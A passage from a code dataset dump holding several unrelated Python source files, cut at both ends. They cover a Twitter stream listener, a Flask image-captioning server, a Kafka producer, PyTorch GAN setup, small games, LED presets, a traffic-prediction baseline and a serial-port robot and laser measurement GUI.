stream_manager\n self.bot = stream_manager.bot_instance\n\n def on_message(self, message):\n \"\"\"Override in subclasses\"\"\"\n raise NotImplementedError(\"on_message() undefined\")\n\n def on_data(self, raw_data):\n \"\"\"Called when raw data is received from connection.\n\n Override this method if you wish to manually handle\n the stream data. 
Return False to stop stream and close connection.\n \"\"\"\n try:\n data = json.loads(raw_data)\n except ValueError:\n self.log_event(\"on_data() can't decode json: %s\" % raw_data)\n return\n finally:\n self.last_keep_alive = now()\n\n if self.on_message(data):\n return\n # twitter warning events\n elif 'limit' in data:\n if self.on_limit(data['limit']) is False:\n return False\n elif 'disconnect' in data:\n if self.on_disconnect(data['disconnect']) is False:\n return False\n elif 'warning' in data:\n # warnings can be received only with stall_warnings=True\n if self.on_warning(data['warning']) is False:\n return False\n else:\n self.log_event(\"unknown message type: \" + str(raw_data))\n\n def log_event(self, msg, db_log=True):\n self.logger.info(u\"[%s] %s\" % (self.stream_id, msg))\n if db_log:\n self.db.add_message(self.stream_id, msg, now())\n\n def on_connect(self):\n \"\"\"Emitted by Stream when connected successfully\"\"\"\n self.log_event('connect')\n self.last_keep_alive = now()\n self.set_event(Events.EVENT_ONLINE)\n\n def keep_alive(self):\n \"\"\"Emitted by Stream when twitter sends \\r\\n bytes or message chunks\"\"\"\n self.last_keep_alive = now()\n\n def on_error(self, status):\n \"\"\"Emitted by Stream when http status != 200.\n Return False to break Stream reconnect loop.\n For 420 (rate limit) and 503 status codes let\n tweepy use back off reconnecting strategy.\"\"\"\n self.log_event('http error %s' % status)\n self.set_event(Events.EVENT_OFFLINE)\n if status not in (420, 503):\n return False\n\n def on_exception(self, exception):\n \"\"\"Emitted by Stream on exceptions during connection\n or stream data handling\"\"\"\n self.logger.warning(u\"[%s]\", self.stream_id, exc_info=True)\n self.log_event(u'exception %s' % exception)\n self.reconnect(exc=exception)\n\n def on_timeout(self):\n \"\"\"Emitted by Stream on network connection timeout\"\"\"\n self.log_event('timeout')\n # no need to reconnect - Stream will snooze connection automatically\n self.set_event(Events.EVENT_OFFLINE)\n return True\n\n def on_closed(self):\n \"\"\"Emitted by Stream when connection suddenly closed by twitter\"\"\"\n self.log_event('closed')\n self.reconnect()\n\n def on_limit(self, track):\n \"\"\"Filtered stream has matched more Tweets\n than its current rate limit allows to be delivered.\n https://dev.twitter.com/streaming/overview/messages-types#limit_notices\n Emitted from self.on_data()\n \"\"\"\n self.log_event('limit %s' % track)\n\n def set_event(self, event_type):\n # when stream killed due to channel deactivation\n # SUSPEND is set just before OFFLINE - keep only first\n already_set = (self.last_event and self.last_keep_alive and\n self.last_event[0] == Events.EVENT_SUSPEND and\n event_type == Events.EVENT_OFFLINE and\n (self.last_event[2] - self.last_keep_alive).total_seconds() <= 1.0)\n # print('ALREADY SET', already_set, event_type)\n if event_type is not None and not already_set:\n self.last_event = (event_type, self.stream_id, self.last_keep_alive, self.last_status_id)\n # print('ADD event', self.last_event)\n self.db.add_event(*self.last_event)\n\n def reconnect(self, exc=None):\n self.log_event('reconnect')\n self.set_event(Events.EVENT_OFFLINE)\n self.stream_manager.on_disconnect(self.stream_id, exc=exc)\n\n def on_disconnect(self, notice):\n \"\"\"https://dev.twitter.com/streaming/overview/messages-types#disconnect_messages\n Emitted from self.on_data()\n \"\"\"\n self.log_event('disconnect %s' % (notice,))\n self.reconnect() # let manager restart stream\n return False\n\n 
def on_warning(self, notice):\n        \"\"\"https://dev.twitter.com/streaming/overview/messages-types#stall_warnings\n        Emitted from self.on_data()\n        \"\"\"\n        self.log_event('warning %s' % notice)\n\n    def on_kill(self):\n        \"\"\"Stop event from bot\"\"\"\n        self.set_event(Events.EVENT_OFFLINE)\n","sub_path":"daemons/twitter/stream/base/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"198112600","text":"\nfrom flask import Flask, request, Response\nimport jsonpickle\nimport numpy as np\nimport cv2\nimport fastai.vision as fv\nimport torch\nimport json \n\nfrom caption import caption_image_beam_search \n\n\n# Initialize the Flask application\napp = Flask(__name__)\n \n\nclass AIModel:\n    def __init__(self):\n        # load room type model \n        device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n        self.learn = fv.load_learner('./models', file='resnet-roomtype.pkl')\n        self.learn.model = self.learn.model.module \n\n        # Load caption model\n        checkpoint = torch.load('BEST_checkpoint_coco_5_cap_per_img_5_min_word_freq.pth.tar', map_location=str(device))\n        self.decoder = checkpoint['decoder']\n        self.decoder = self.decoder.to(device)\n        self.decoder.eval()\n        self.encoder = checkpoint['encoder']\n        self.encoder = self.encoder.to(device)\n        self.encoder.eval()\n\n        # Load word map (word2ix)\n        with open('WORDMAP_coco_5_cap_per_img_5_min_word_freq.json', 'r') as j:\n            self.word_map = json.load(j)\n        self.rev_word_map = {v: k for k, v in self.word_map.items()}  # ix2word\n\n    def getRoomType(self, img_path): \n        img = fv.open_image(img_path)\n        predict_class,predict_idx,predict_values = self.learn.predict(img)\n        return predict_class, predict_idx, predict_values \n\n\n    def getDescription(self, img_path, beam_size=5): \n        # Encode, decode with attention and beam search\n        seq, alphas = caption_image_beam_search(self.encoder, self.decoder, img_path, self.word_map, beam_size)\n        alphas = torch.FloatTensor(alphas)\n        #Final predicted sentence\n        words = [self.rev_word_map[ind] for ind in seq]\n        return words \n\n\n\naiModel = AIModel()\n\n\n# route http posts to this method\n@app.route('/api/get_room_type', methods=['POST'])\ndef get_room_type():\n    r = request\n    # convert raw image bytes to a uint8 array\n    nparr = np.frombuffer(r.data, np.uint8)\n    # decode image\n    img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n    TEMP_IMAGE_PATH = 'temp.jpg'\n    cv2.imwrite(TEMP_IMAGE_PATH, img)\n\n    predict_class, predict_idx, predict_values = aiModel.getRoomType(TEMP_IMAGE_PATH)\n    confidence = predict_values[predict_idx.item()].item()\n    \n    # build a response dict to send back to client\n    strClass = f'{predict_class}'\n    response = {\"class\":strClass,\"confidence\":confidence}\n    # encode response using jsonpickle\n    response_pickled = jsonpickle.encode(response)\n\n    return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n\n# route http posts to this method\n@app.route('/api/get_description', methods=['POST'])\ndef get_description():\n    r = request\n    # convert raw image bytes to a uint8 array\n    nparr = np.frombuffer(r.data, np.uint8)\n    # decode image\n    img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n    TEMP_IMAGE_PATH = 'temp.jpg'\n    cv2.imwrite(TEMP_IMAGE_PATH, img)\n\n    description = aiModel.getDescription(TEMP_IMAGE_PATH)\n    description = description[1:-1]\n    description = ' '.join(description)\n\n    # build a response dict to send back to client\n    response = {'message': description}\n    # encode 
response using jsonpickle\n    response_pickled = jsonpickle.encode(response)\n\n    return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\nif __name__ == '__main__':\n    \n    # start flask app\n    app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"559586385","text":"\"\"\" Kafka Producer\nUsage:\n    producer.py [--servers=<servers>] [--topic=<topic>] [--message=<message>]\n    producer.py --version\n    producer.py (-h | --help)\n\nOptions:\n    -h --help                               Show this screen\n    --version                               Show version\n    --servers=<servers>                     Servers separated by comma\n    --topic=<topic>                         Topic name\n    --message=<message>                     Message string\n\"\"\"\nfrom kafka import KafkaProducer\nfrom docopt import docopt\n\n\nif __name__ == '__main__':\n    arguments = docopt(__doc__, version='Kafka Producer v0.1')\n\n    servers = None\n    if '--servers' in arguments:\n        servers = arguments.get('--servers')\n\n    topic = None\n    if '--topic' in arguments:\n        topic = arguments.get('--topic')\n\n    message = None\n    if '--message' in arguments:\n        message = arguments.get('--message')\n\n    producer = KafkaProducer(\n        bootstrap_servers=servers\n    )\n\n    producer.send(topic, message)\n","sub_path":"tools/kafka_helper/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"14643463","text":"from google.appengine.ext import db\nfrom google.appengine.api import memcache\nimport UserHandler\nimport datetime\nimport logging\n\nHOST_COOLDOWN = 60*5\nDEFAULT_EXPIRE = 60*60\n\ndef retrieveCache(key, model):\n    data = memcache.get(key)\n    if data is not None:\n        return data\n    else:\n        data = model.get_by_key_name(key)\n        memcache.add(key, data, time=DEFAULT_EXPIRE)\n        return data\n\ndef storeCache(data, key):\n    if not memcache.replace(key, data):\n        memcache.add(key, data, time=DEFAULT_EXPIRE)\n    return data.put()\n\ndef deleteData(data, key):\n    memcache.delete(key)\n    db.delete(data)\n\ndef markPlayerHostedGame(user_id):\n    user = retrieveCache(user_id, UserHandler.User)\n    user.last_hosted = datetime.datetime.now()\n    storeCache(user, user_id)\n    return user\n\ndef canPlayerHost(user_id):\n    user = retrieveCache(user_id, UserHandler.User)\n    if user.last_hosted is None:\n        user.last_hosted = (datetime.datetime.now() - datetime.timedelta(seconds=HOST_COOLDOWN*2))\n        storeCache(user, user_id)\n    return (datetime.datetime.now() - user.last_hosted).seconds > HOST_COOLDOWN\n\ndef resetPlayerHost(user_id):\n    user = retrieveCache(user_id, UserHandler.User)\n    user.last_hosted = (datetime.datetime.now() - datetime.timedelta(seconds=HOST_COOLDOWN*2))\n    storeCache(user, user_id)\n    return user\n","sub_path":"cacheLib.py","file_name":"cacheLib.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"80023814","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.nn import init\r\nfrom models.generator import UnetGenerator\r\nfrom models.discriminator import SNResNetProjectionDiscriminator\r\n\r\ndef init_weights(net, init_type='normal', gain=0.02):\r\n    def init_func(m):\r\n        classname = m.__class__.__name__\r\n        if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\r\n            if init_type == 'normal':\r\n                init.normal_(m.weight.data, 0.0, gain)\r\n            elif init_type == 
'xavier':\r\n init.xavier_normal_(m.weight.data, gain=gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n init.constant_(m.bias.data, 0.0)\r\n elif classname.find('CategoricalConditionalBatchNorm2d') != -1:\r\n pass\r\n elif classname.find('BatchNorm2d') != -1:\r\n init.normal_(m.weight.data, 1.0, gain)\r\n init.constant_(m.bias.data, 0.0)\r\n\r\n print('initialize network with [{}]'.format(init_type))\r\n net.apply(init_func)\r\n\r\ndef init_net(net, init_type='normal', gain=0.02, gpu_ids=[]):\r\n if len(gpu_ids) > 0:\r\n net.cuda()\r\n if len(gpu_ids) > 1:\r\n net = nn.DataParallel(net, gpu_ids)\r\n init_weights(net, init_type=init_type, gain=gain)\r\n return net\r\n\r\n\r\ndef define_G(netG, input_nc, output_nc, num_class, init_type='xavier', gpu_ids=[]):\r\n if netG == 'unet_cbn':\r\n netG = UnetGenerator(input_nc, output_nc, num_class)\r\n else:\r\n raise NotImplementedError('Generator [{}] is not implemented.'.format(netG))\r\n\r\n return init_net(netG, init_type, gpu_ids=gpu_ids)\r\n\r\ndef define_D(netD, input_nc, ndf, num_class, init_type='xavier', gpu_ids=[]):\r\n if netD == 'snprojection':\r\n netD = SNResNetProjectionDiscriminator(input_nc, ndf, num_class)\r\n else:\r\n raise NotImplementedError('Discriminator [{}] is not implemented.'.format(netD))\r\n\r\n return init_net(netD, init_type, gpu_ids=gpu_ids)\r\n","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"245297360","text":"# Course: 100 Days of Code - The Complete Python Pro Bootcamp for 2022 (Udemy)\n# Instructor: Dr. Angela Yu\n# Day 23: Capstone Project - The Turtle Crossing\n# Project: The Turtle Crossing\n# Date: April 9, 2022\n# Author: Dan Wadleigh\n\nimport time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nplayer = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(player.move, \"Up\")\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n\n car_manager.create_car()\n car_manager.move_cars()\n\n # Detect collision with cars\n for car in car_manager.all_cars:\n if car.distance(player) < 20:\n game_is_on = False\n scoreboard.game_over()\n\n # Detect collision with end wall - complete Level\n if player.is_at_finish_line():\n player.reset_position()\n car_manager.level_up()\n scoreboard.increase_level()\n\nscreen.exitonclick()\n\n\n\n\n\n\n","sub_path":"20-learning/99-udemy-100-days-code-python-pro/day023/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3191179","text":"import math\nimport numpy as np\nfrom collections import defaultdict\n\nfrom lib.raw_preset import RawPreset\nfrom lib.parameters import StringParameter, FloatParameter, HLSParameter, IntParameter\nfrom lib.color_fade import ColorFade\n\nclass PositionPulser(RawPreset):\n class AudioEmitterPulser(object):\n def __init__(self, audio_emitter, fade_colors, fade_steps):\n self.audio_emitter = audio_emitter\n self._fader = ColorFade(fade_colors, fade_steps)\n self.value = 0.0\n self.color = 0\n\n def setup(self):\n self.audio_emitter_pulsers = {}\n 
self.add_parameter(StringParameter('feature', 'vumeter'))\n self.feature = self.parameter('feature').get()\n self.add_parameter(FloatParameter('scale', 10.0))\n self.add_parameter(HLSParameter('color-start', (0.0, 0.5, 1.0)))\n self.add_parameter(HLSParameter('color-end', (1.0, 0.5, 1.0)))\n self.add_parameter(IntParameter('color-steps', 256))\n self.add_parameter(FloatParameter('color-speed', 10.0))\n\n def parameter_changed(self, parameter):\n self.feature = self.parameter('feature').get()\n\n def reset(self):\n self.pixel_locations = self.scene().get_all_pixel_locations()\n\n def draw(self, dt):\n x, y = self.pixel_locations.T\n\n # Make a blank color canvas for additive mixing.\n hues = np.zeros(x.shape, float)\n\n # Make every pixel dark.\n luminances = np.zeros(x.shape, float)\n\n scale = self.parameter('scale').get()\n color_speed = self.parameter('color-speed').get()\n for _, pulser in self.audio_emitter_pulsers.iteritems():\n position = pulser.audio_emitter.position()\n\n if not position:\n continue\n\n pulser_x, pulser_y, _ = position\n\n # For every pixel, get the vector between the pixel and this pulser.\n dx, dy = (self.pixel_locations - (pulser_x, pulser_y)).T\n\n # And make a column vector of the distances between every pixel and\n # this pulser.\n pixel_distances = np.sqrt(np.square(dx) + np.square(dy))\n\n # Select all pixels less than scale * feature-value from the pulser.\n selector = pixel_distances < pulser.value * scale\n\n # Color them with a color from the fader. Add the color so that\n # overlapping colors mix.\n hues[selector] += pulser._fader.get_color_wrapped(pulser.color)[0]\n\n # and illuminate them.\n luminances[selector] = 0.5\n\n # Increment the pulser's color ticker by the color-speed parameter.\n pulser.color += color_speed * dt\n\n self.setAllHLS(hues, luminances, 1)\n\n def on_feature(self, feature):\n if feature['feature'] != self.feature:\n return\n\n group = feature['group']\n audio_emitter = self._mixer.audio_emitter(group)\n\n pulser = self.audio_emitter_pulsers.get(group, None)\n if pulser is None:\n fade_colors = [self.parameter('color-start').get(),\n self.parameter('color-end').get(),\n self.parameter('color-start').get()]\n color_steps = self.parameter('color-steps').get()\n pulser = PositionPulser.AudioEmitterPulser(\n audio_emitter, fade_colors, color_steps)\n self.audio_emitter_pulsers[group] = pulser\n pulser.value = feature['value']\n\nclass PositionDonutParticles(RawPreset):\n \"\"\"Emits 'donut' particles from positions of AudioEmitters when the\n specified feature parameter goes high.\"\"\"\n\n class DonutParticle(object):\n def __init__(self, position, fade_colors, fade_steps):\n self.position = position\n self.distance = 0\n self.color = 0\n self._fader = ColorFade(fade_colors, fade_steps)\n self.alive = True\n\n def setup(self):\n self.particles = []\n self.max_distance = 0\n self.feature_value_triggered = defaultdict(lambda: False)\n self.add_parameter(StringParameter('feature', 'beat'))\n self.add_parameter(FloatParameter('speed', 100))\n self.add_parameter(FloatParameter('width', 5))\n self.add_parameter(HLSParameter('color-start', (0.0, 0.5, 1.0)))\n self.add_parameter(HLSParameter('color-end', (1.0, 0.5, 1.0)))\n self.add_parameter(IntParameter('color-steps', 256))\n self.add_parameter(FloatParameter('color-speed', 10.0))\n\n def parameter_changed(self, parameter):\n self.feature = self.parameter('feature').get()\n\n def reset(self):\n self.pixel_locations = self.scene().get_all_pixel_locations()\n extent_x, extent_y = 
self.scene().extents()\n self.max_distance = math.sqrt(extent_x ** 2 + extent_y ** 2)\n\n def draw(self, dt):\n x, y = self.pixel_locations.T\n\n hues = np.zeros(x.shape, float)\n luminances = np.zeros(x.shape, float)\n\n speed = self.parameter('speed').get()\n width = self.parameter('width').get()\n color_speed = self.parameter('color-speed').get()\n for particle in self.particles:\n particle_x, particle_y, _ = particle.position\n particle.distance += dt * speed\n\n # For every pixel, get the vector between the pixel and this particle.\n dx, dy = (self.pixel_locations - (particle_x, particle_y)).T\n\n # And make a column vector of the distances between every pixel and\n # this particle.\n pixel_distances = np.sqrt(np.square(dx) + np.square(dy))\n\n # Select all pixels less than width distance from current location\n # of the particle's width.\n selector = np.abs(pixel_distances - particle.distance) < width\n\n # Color them with a color from the fader. Add the color so that\n # overlapping colors mix.\n hues[selector] += particle._fader.get_color_wrapped(particle.color)[0]\n\n # and illuminate them.\n luminances[selector] = 0.5\n\n # Increment the pulser's color ticker by the color-speed parameter.\n particle.color += color_speed * dt\n\n if particle.distance > self.max_distance:\n particle.alive = False\n\n self.particles = filter(lambda particle: particle.alive, self.particles)\n\n self.setAllHLS(hues, luminances, 1)\n\n def on_feature(self, feature):\n if feature['feature'] != self.feature:\n return\n\n feature_value = feature['value']\n\n group = feature['group']\n audio_emitter = self._mixer.audio_emitter(group)\n\n if not feature_value:\n self.feature_value_triggered[group] = False\n return\n\n # We already processed this feature.\n if self.feature_value_triggered[group]:\n return\n\n position = audio_emitter.position()\n if position is None:\n return\n\n fade_colors = [self.parameter('color-start').get(),\n self.parameter('color-end').get(),\n self.parameter('color-start').get()]\n color_steps = self.parameter('color-steps').get()\n\n self.particles.append(PositionDonutParticles.DonutParticle(\n position, fade_colors, color_steps))\n self.feature_value_triggered[group] = True\n","sub_path":"presets/beat.py","file_name":"beat.py","file_ext":"py","file_size_in_byte":7349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"410840147","text":"from datetime import datetime\n\nimport pandas as pd\n\nfrom misc import TravelTimeSubmission as submission, get_traffic as traffic\n\n\ndef from_index_to_prediction_day(day, h):\n if day > 0:\n start = datetime(2016, 10, 24 + day, h[0][0], h[0][1], 0)\n end = datetime(2016, 10, 24 + day, h[1][0], h[1][1], 0)\n else: #monday (0) is the 31.10.2016\n start = datetime(2016, 10, 31 + day, h[0][0], h[0][1], 0)\n end = datetime(2016, 10, 31 + day, h[1][0], h[1][1], 0)\n return \"[\" + str(start) + \",\" + str(end) + \")\"\n\n#we are interested in all weekdays\nweekdays = [0, 1, 2, 3, 4, 5, 6]\n\n# all 20 min windows\ntimes = [[(8, 00), (8, 20)], [(8, 20), (8, 40)], [(8, 40), (9, 00)], [(9, 00), (9, 20)], [(9, 20), (9, 40)],[(9, 40), (10, 00)],\n [(17, 00), (17, 20)], [(17, 20), (17, 40)], [(17, 40), (18, 00)], [(18, 00), (18, 20)], [(18, 20), (18, 40)],[(18, 40), (19, 00)]]\n\n# the result panda data frame\ndfResult = pd.DataFrame(columns=[\"intersection_id\", \"tollgate_id\", \"avg_travel_time\", \"time_window\"])\n\n# iterate over all weekday - timeWindow pairs\nfor day in weekdays:\n for hours in 
times:\n        # calculate for each timewindow the avg_travel_time based on the data in this time window\n        df2 = traffic.get_traffic([day], [[(hours[0][0], hours[0][1]), (hours[1][0], hours[1][1])]]).groupby(['intersection_id', 'tollgate_id'])[\n            'travel_time'].mean().reset_index(name=\"avg_travel_time\")\n        df3 = pd.DataFrame(df2, columns=[\"intersection_id\", \"tollgate_id\", \"avg_travel_time\", \"time_window\"])\n        # add the time window column to the dataframe\n        df3[\"time_window\"] = from_index_to_prediction_day(day, hours)\n        # add the time window data to the result data frame\n        dfResult = pd.concat([dfResult, df3], axis=0, ignore_index=1)\n\ndfResult = dfResult[[\"intersection_id\", \"tollgate_id\", \"avg_travel_time\", \"time_window\"]]\nsubmission.TravelTimeSubmission.save_df_travel_time_submission(submission.TravelTimeSubmission, dfResult)\n\n","sub_path":"python/traffic-prediction/src/baseline/Last3MonthsSubmission.py","file_name":"Last3MonthsSubmission.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"204842274","text":"# Author - Nilesh D\n# December 14 - A Wordplay with Vowels and Consonants\n\n\ndef subString(s, n):\n    vowel = ['a', 'e', 'i', 'o', 'u']\n    scoreA = scoreB = 0\n    for i in range(n):\n        for end in range(i+1, n+1):\n            subsStr = s[i: end]\n            if subsStr[0] in vowel:\n                scoreA += 1\n            else:\n                scoreB += 1\n    if scoreA > scoreB:\n        print(\"The winner is A with\", scoreA, \"points\")\n    elif scoreB > scoreA:\n        print(\"The winner is B with\", scoreB, \"points\")\n    else:\n        print(\"Draw\")\n\n\ns = input(\"Enter string: \")\nsubString(s, len(s))\n","sub_path":"December-14/python_Nilesh2000.py","file_name":"python_Nilesh2000.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"132373517","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n# Program for measuring mandrels (core rods) used in pipe drawing\n# $Id: shaft_measure.py,v 1.3 2007/10/23 08:40:06 ishi Exp ishi $\n\nmsg = \"\"\"This program controls a Keyence laser dimension gauge (LS-5000 or LS-5120)\nand a Yamaha Motor single-axis robot FLIP LT-850 over RS232C,\nso that the dimensions of pipe-drawing mandrels can be measured easily.\nIt is written in Python and assumes wxPython 2.6 or later, python 2.4 and pySerial 2.2.\n\nThe robot LT-850 is assumed to be connected through an IO-DATA USB-serial\nconverter USB-RSAQ2, and the laser gauge LS-5000 through serial port 2.\n\nNote that the robot connection needs a crossover cable.\nThe laser needs its dedicated cable OP-96368 and connector OP-96369.\n\nAlso, the user running this program must belong to the uucp group,\notherwise /dev/tty* cannot be accessed.\n\nConfigure the laser gauge on the unit itself: a program can only read and\nwrite its settings as one opaque binary blob, and that format is not\ndocumented in the manual.\n\nDuring a measurement it is best to let the robot sit still for about one\nsecond every time it moves to a position; set this with the stop time in\nthe robot settings dialog.\n\nRun it as python shaft_measure.py.\nRunning python \"shaft_measure.py -I\" first forces the robot back to its origin;\ntry this when the program does not work, e.g. right after the robot\ncontroller has been switched on.\n\n2007/08/01 石崎由宣\n\"\"\"\n\nimport sys,os\nimport time\nimport serial\nimport wx\nfrom wx import xrc\nimport wx.grid as grid\n\n######################################################################\n# global data\n######################################################################\nresfile = os.getcwd() + \"/shaft_measure.xrc\"\n\nrobotPort = None\nlaserPort = None\n\n######################################################################\n# robot handler\n######################################################################\nclass MyRobotControler:\n    def __init__(self,settings = None, parent = None ):\n        self.setParent(parent)\n        self.setSettings(settings)\n\n    def setParent(self,parent):\n        self.parent = parent\n    \n    def setSettings(self,settings):\n        self.settings = settings\n        if settings 
== None:\n            self.settings = {'RobotSpeed' : \"20\"}\n\n    def setKey( self,key,string ):\n        self.settings[key] = str(string)\n\n    def getKey( self,key ):\n        if self.settings.has_key(key):\n            return self.settings[key]\n        else:\n            return \"\"\n    \n    def moveRobot( self,x = '0.0',speed = '' ):\n        if robotPort != None and robotPort.isOpen():\n            if len(speed) :\n                ss = speed\n            else:\n                ss = self.settings['RobotSpeed']\n            \n            s = \"@MOVD \" + str(x) + \",\" + ss + \"\\r\"\n            robotPort.write(s)\n            ans = robotPort.readlines()\n            return ans\n        else:\n            d = wx.MessageDialog(self.parent,\"The RS232C port to the robot is not open.\",\"Warning\",wx.OK|wx.ICON_WARNING)\n            d.ShowModal()\n            d.Destroy()\n            return\n\n# this is a global item\ndefaultSetting = {\n    'RobotSpeed': '20','RobotX0': '0.0', 'RobotSpan':'500.0', 'RobotKizami': '2.0','RobotWait': '3.0','RobotStop': '1.0',\n    }\ntheControler = MyRobotControler(defaultSetting)\n \n######################################################################\n# MyRobotRefPntSetDialog\n######################################################################\nclass MyRobotRefPntSetDialog(wx.Dialog):\n    def __init__(self,parent):\n        d = wx.PreDialog()\n        res = xrc.XmlResource(resfile)\n        res.LoadOnDialog(d,parent,\"robotRefPntDialog\")\n        self.PostCreate(d)\n\n        self.curX0 = xrc.XRCCTRL(self,\"txtCurX0\")\n        self.txtRobotSpan = xrc.XRCCTRL(self,\"txtRobotSpan\")\n        self.txtRobotKizami = xrc.XRCCTRL(self,\"txtRobotKizami\")\n        self.txtRobotSpeed = xrc.XRCCTRL(self,\"txtRobotSpeed\")\n        self.txtRobotWait = xrc.XRCCTRL(self,\"txtRobotWait\")\n        self.txtRobotStop = xrc.XRCCTRL(self,\"txtRobotStop\")\n        \n        self.robotPos = xrc.XRCCTRL(self,\"txtRobotPos\")\n        self.spnButton = xrc.XRCCTRL(self,\"spnRobotPos\")\n        self.robotStep = xrc.XRCCTRL(self,\"txtRobotStep\")\n        self.laserVal = xrc.XRCCTRL(self,\"txtLaserVal\")\n\n        # reflect the current settings in the dialog\n        self.curX0.SetValue( theControler.getKey('RobotX0') )\n        self.txtRobotSpan.SetValue( theControler.getKey('RobotSpan') )\n        self.txtRobotKizami.SetValue( theControler.getKey('RobotKizami') )\n        self.txtRobotSpeed.SetValue( theControler.getKey('RobotSpeed') )\n        self.txtRobotWait.SetValue( theControler.getKey('RobotWait') )\n        self.txtRobotStop.SetValue( theControler.getKey('RobotStop'))\n        \n        # reflect the robot's current position\n        robotPort.write(\"@?POS\\r\")\n        for s in robotPort.readlines():\n            s2 = s.rstrip()\n            if s2 == \"NG\" or s2 == \"OK\" or s.find(\"%\") >= 0 :\n                continue\n            else:\n                v = float(s2)\n                self.robotPos.SetValue(str(v))\n                break \n        \n        self.Bind(wx.EVT_BUTTON, self.OnCancel, id = xrc.XRCID(\"wxID_CANCEL\"))\n        self.Bind(wx.EVT_BUTTON, self.OnRobotReset, id = xrc.XRCID(\"btnReset\"))\n        self.Bind(wx.EVT_BUTTON, self.OnRobotGo, id = xrc.XRCID(\"btnRobotGo\"))\n        self.Bind(wx.EVT_BUTTON, self.OnSetRef, id = xrc.XRCID(\"btnSetRef\"))\n\n        self.Bind(wx.EVT_SPIN_UP, self.OnSpinUp, self.spnButton )\n        self.Bind(wx.EVT_SPIN_DOWN, self.OnSpinDown, self.spnButton )\n        \n        self.txtRobotSpan.SetFocus()\n\n    # functions\n    def OnSpinUp(self,evt):\n        dx = float( self.robotStep.GetValue() )\n        x = float( self.robotPos.GetValue() )\n        x += dx\n        self.robotPos.SetValue( str(x) )\n    \n    def OnSpinDown(self,evt):\n        dx = float( self.robotStep.GetValue() )\n        x = float( self.robotPos.GetValue() )\n        x -= dx\n        self.robotPos.SetValue( str(x) )\n\n    def OnCancel(self,evt):\n        self.EndModal(wx.ID_CANCEL)\n    \n    def OnSetRef(self,evt):\n        sp = float(self.txtRobotSpan.GetValue())\n        x0 = float(self.robotPos.GetValue())\n        if sp > x0 :\n            md = wx.MessageDialog(self,\"The measurement span must not be larger than the origin (current position) you set.\",\n                                  \"Warning\",wx.OK|wx.ICON_WARNING )\n            md.ShowModal()\n            
md.Destroy()\n        else:\n            theControler.setKey('RobotSpan',sp)\n            theControler.setKey('RobotKizami',self.txtRobotKizami.GetValue())\n            theControler.setKey('RobotSpeed',self.txtRobotSpeed.GetValue())\n            theControler.setKey('RobotWait',self.txtRobotWait.GetValue())\n            theControler.setKey('RobotStop',self.txtRobotStop.GetValue())\n            theControler.setKey('RobotX0',x0)\n\n            self.EndModal(wx.ID_OK)\n\n    def OnRobotGo(self,evt):\n        \"Move the robot to the given position and show the laser reading\"\n        theControler.moveRobot(self.robotPos.GetValue(),self.txtRobotSpeed.GetValue())\n        # read the laser\n        st = float(self.txtRobotStop.GetValue())\n        time.sleep( st )\n        laserPort.write(\"M1\\r\")\n        vs = laserPort.readline()\n        if vs.find(\"-\") >=0:\n            self.laserVal.SetValue( vs )\n        else:\n            v = float(vs)\n            self.laserVal.SetValue( str(v) )\n    \n    def OnRobotReset(self,evt):\n        \"Move the robot to the current origin position\"\n        s = self.curX0.GetValue()\n        self.robotPos.SetValue(s)\n        theControler.moveRobot(s,self.txtRobotSpeed.GetValue() )\n        \n        # read the laser\n        st = float(self.txtRobotStop.GetValue())\n        time.sleep( st )\n        laserPort.write(\"M1\\r\")\n        vs = laserPort.readline()\n        if vs.find(\"-\") >=0:\n            self.laserVal.SetValue( vs )\n        else:\n            v = float(vs)\n            self.laserVal.SetValue( str(v) )\n\n    def GetRobotX0(self):\n        return self.robotPos.GetValue()\n    \n######################################################################\n# MyRS232CSettingDlg\n######################################################################\nclass MyRS232CSettingDlg(wx.Dialog):\n    def __init__(self,parent):\n        d = wx.PreDialog()\n        res = xrc.XmlResource(resfile)\n        res.LoadOnDialog(d,parent,\"rs232cSettingDlg\")\n        self.PostCreate(d)\n\n        #self.Bind(wx.EVT_BUTTON, self.OnCancel, id = xrc.XRCID(\"wxID_CANCEL\"))\n        self.Bind(wx.EVT_BUTTON, 